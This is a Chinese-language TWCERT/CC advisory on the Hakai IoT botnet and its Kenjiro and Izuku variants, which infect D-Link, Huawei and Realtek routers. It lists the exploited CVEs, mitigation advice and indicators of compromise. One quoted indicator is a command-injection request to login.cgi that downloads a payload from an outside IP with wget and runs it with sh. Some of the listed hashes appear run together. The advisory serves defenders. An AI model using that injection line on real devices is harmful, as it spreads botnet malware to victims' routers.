新的Hakai IoT 殭屍病毒針對D-Link、華為及Realtek路由器及IoT裝置進行感染
- 發布單位:TWCERT/CC
- 更新日期:2020-05-26
- 點閱次數:879
1. 一稱作Hakai針對IoT裝置的殭屍網路病毒正蓄勢待發,針對D-Link、華為及Realtek路由器進行感染。
2. Hakai病毒源自於Qbot病毒,目前也已有Kenjiro及Izuku兩個Hakai變種病毒出現。
資安專家近期發現一稱作Hakai(源於日文中破壞之意),針對IoT裝置的殭屍網路病毒,有悄悄成長的趨勢。Hakai的第一版是以已出現多年的IoT殭屍病毒Qbot(也稱作Gafgyt、Bashlite、Lizkebab、Torlus或LizardStresser)作為參考所開發,除複雜度較低,亦無活躍行為,第一次出現是在今年六月,由NewSky Security的資安專家所提出討論。
NewSky Security的資安專家Ankit Anubhav指出,該病毒一開始似乎是想追求能見度及吸引大眾注意力,因此甚至把Ankit的照片作為殭屍網路C&C伺服器 (hakaiboatnet[.]pw)的首頁圖。
但從7月底起,資安專家觀察到Hakai開始積極入侵使用者裝置,到目前為止發現Hakai有能力入侵之裝置如下:
●含有CVE-2017-17215漏洞之華為HG352路由器
●支援HNAP協定之D-Link路由器
●使用含有CVE-2014-8361漏洞Realtek SDK之IoT產品及路由器
●含有特定漏洞之D-Link DIR-645路由器 (https://www.exploit-db.com/exploits/38722/)
●含有特定漏洞之D-Link DSL-2750B路由器 (https://www.exploit-db.com/exploits/44760/)
除上述漏洞,Hakai本身亦具備高效率之Telnet掃描工具,因此只要目標裝置使用預設密碼或弱密碼,如root、admin及1234等,甚至可以不用透過漏洞入侵裝置就可取得裝置掌控權。
另資安專家發現,Hakai的作者作風比以往來的低調許多,也把資安專家的照片從C&C伺服器中移除,這有可能跟近期另一病毒製造者Nexus Zeta因暴露過多個人資訊,而導致被逮捕的事件有關。
此外,資安專家發現有兩個新的Hakai變種病毒,分別是Kenjiro及Izuku,也開始在網路中散播,其使用來散播病毒的漏洞如下:
●D-Link DSL-2750B – OS Command Injection (https://www.exploit-db.com/exploits/44760/)
●CVE-2015-2051 (https://www.exploit-db.com/exploits/37171/)
●CVE-2017-17215 (https://www.exploit-db.com/exploits/43414/)
●CVE-2014-8361 (https://www.exploit-db.com/exploits/37169/)
TWCERT/CC建議:
1. 使用者若購買IoT或路由器等設備,需立即修改預設密碼,並設置中高強度之密碼,且定時進行軟韌體更新。
2. 將相關IoC加入防火牆中。
Hakai相關IoC資訊如下:
●MD5:0590e9af54485c9a94ed97ea1b7c022ce7a32ca82dca999437e5ebb4c76b676002baea1994dc58bbfa3bf7944629a6e3c288f1fa87225e61f0757fb9eaeb237c
●SHA256:8ff5a8e20209267984ca4fe609ae7a8feccabda9114304c1444abc53cb169f5f3d98fd28c344b067e91881d06942f7532a1f4084d908d882d3975fe0709c85f59
688a3fdfd8fcb2caa2962623af9cd64c2a74887057900dbca5179aef8c5f3194072d3b5393d86bf5b6586eec58efe79f3b5b428d183048968ad329fc982aa45
●字串:
GET /login.cgi?cli=aa aa’;wget hxxp://46[.]166[.]185[.]42/e -O -> /tmp/hk;sh /tmp/hk’
●C&C伺服器:
115[.]211[.]158[.]127
151[.]25[.]16[.]155
151[.]67[.]179[.]72
151[.]70[.]150[.]145
156[.]194[.]16[.]10
156[.]194[.]186[.]237
156[.]194[.]226[.]4
156[.]194[.]41[.]138
156[.]195[.]200[.]13
156[.]196[.]179[.]29
156[.]196[.]185[.]140
156[.]196[.]200[.]81
156[.]196[.]242[.]173
156[.]197[.]171[.]232
156[.]198[.]221[.]75
156[.]199[.]204[.]140
156[.]199[.]77[.]123
156[.]201[.]79[.]16
156[.]203[.]178[.]17
156[.]204[.]155[.]113
156[.]205[.]135[.]43
156[.]205[.]195[.]104
156[.]206[.]115[.]220
156[.]209[.]198[.]100
156[.]209[.]232[.]198
156[.]209[.]54[.]177
156[.]210[.]187[.]42
156[.]211[.]96[.]230
156[.]212[.]13[.]107
156[.]212[.]209[.]151
156[.]212[.]214[.]221
156[.]212[.]98[.]46
156[.]213[.]104[.]172
156[.]213[.]169[.]78
156[.]213[.]173[.]45
156[.]213[.]244[.]171
156[.]213[.]99[.]66
156[.]216[.]224[.]31
156[.]217[.]140[.]86
156[.]217[.]50[.]123
156[.]218[.]75[.]76
156[.]219[.]145[.]253
156[.]219[.]192[.]162
156[.]219[.]229[.]182
156[.]220[.]127[.]23
156[.]220[.]138[.]137
156[.]220[.]143[.]93
156[.]220[.]253[.]82
156[.]220[.]44[.]52
156[.]221[.]116[.]143
156[.]221[.]123[.]7
156[.]221[.]148[.]113
156[.]221[.]172[.]223
156[.]221[.]5[.]177
156[.]223[.]130[.]168
156[.]223[.]165[.]48
156[.]223[.]95[.]196
187[.]64[.]72[.]94
197[.]246[.]180[.]121
197[.]32[.]137[.]152
197[.]32[.]8[.]123
197[.]34[.]56[.]237
197[.]38[.]130[.]42
197[.]38[.]71[.]15
197[.]39[.]86[.]166
197[.]41[.]204[.]206
197[.]42[.]132[.]154
197[.]42[.]33[.]96
197[.]44[.]8[.]66
197[.]46[.]178[.]52
197[.]51[.]1[.]213
197[.]52[.]14[.]196
197[.]52[.]168[.]225
197[.]54[.]198[.]40
197[.]54[.]98[.]170
197[.]55[.]65[.]76
197[.]55[.]80[.]40
197[.]57[.]173[.]100
197[.]58[.]121[.]102
197[.]58[.]237[.]253
31[.]194[.]147[.]178
41[.]230[.]140[.]29
41[.]232[.]65[.]213
41[.]234[.]237[.]128
41[.]235[.]138[.]212
41[.]235[.]183[.]103
41[.]238[.]179[.]235
41[.]238[.]9[.]217
41[.]239[.]164[.]80
41[.]35[.]24[.]91
41[.]36[.]188[.]159
41[.]36[.]244[.]219
41[.]36[.]248[.]103
41[.]36[.]30[.]115
41[.]37[.]27[.]36
41[.]38[.]139[.]146
41[.]39[.]39[.]33
41[.]41[.]112[.]189
41[.]42[.]150[.]61
41[.]42[.]205[.]120
41[.]44[.]103[.]75
41[.]44[.]127[.]25
41[.]44[.]196[.]33
41[.]44[.]3[.]243
41[.]44[.]53[.]155
41[.]44[.]56[.]89
41[.]45[.]128[.]60
41[.]45[.]143[.]5
41[.]45[.]182[.]174
41[.]46[.]143[.]91
41[.]46[.]243[.]97
41[.]47[.]49[.]254
79[.]129[.]7[.]154
79[.]24[.]80[.]194
80[.]15[.]21[.]65
80[.]183[.]8[.]179
83[.]28[.]135[.]202
85[.]72[.]59[.]101
94[.]70[.]161[.]249
Kenjiro及Izuku相關IoC資訊如下:
●Kenjiro (989.6 KB (1013368 bytes)):
MD5:3076019879329f2f34e6870823a8d929
SHA256:8917934e6fa901f22b58fd7424a45f50b5a89f9daa871a69b45d6a39191c9f1b
●Izuku (988.5 KB (1012184 bytes)):
MD5:8acb0dd52be0ba61f2ce10ad847e9da4
SHA256:03a6f848b05d27bfbe8360c3c9ecd2cd9aa33d43702186c62c4a115e23383983
●其他Hakai變種之SHA256:
16eb66ebe74931e637d856b2189714fc3e25baf8af5ba41bb75f976ca56ee307
4a6ee70c3952092d41ef89f0d0910015c00b026a84c07eff1fbcda1a0a00fb1c
0f5b814308193064bc4ece4266def5c1baecc491117f07650c5117762648d4c5
721da99e8789cdcb73db87353e2be7b82c9158e2929b9eaa7d5b4660b6d4d1e2
●C&C伺服器:
46[.]166[.]185[.]42
77[.]87[.]77[.]250
178[.]128[.]185[.]250
148[.]72[.]176[.]78
hakaiboatnet[.]pw
參考連結:
https://www.zdnet.com/article/new-hakai-iot-botnet-takes-aim-at-d-link-huawei-and-realtek-routers/
https://www.intezer.com/elf-support-released-hakai-malware/
https://www.thedailybeast.com/newbie-hacker-fingered-for-monster-botnet
https://sidechannel.tempestsi.com/hakai-botnet-shows-signs-of-intense-activity-in-latin-america-724ffb84d5cb
相關連結
- https://www.zdnet.com/article/new-hakai-iot-botnet-takes-aim-at-d-link-huawei-and-realtek-routers/
- https://www.intezer.com/elf-support-released-hakai-malware/
- https://www.thedailybeast.com/newbie-hacker-fingered-for-monster-botnet
- https://sidechannel.tempestsi.com/hakai-botnet-shows-signs-of-intense-activity-in-latin-america-724f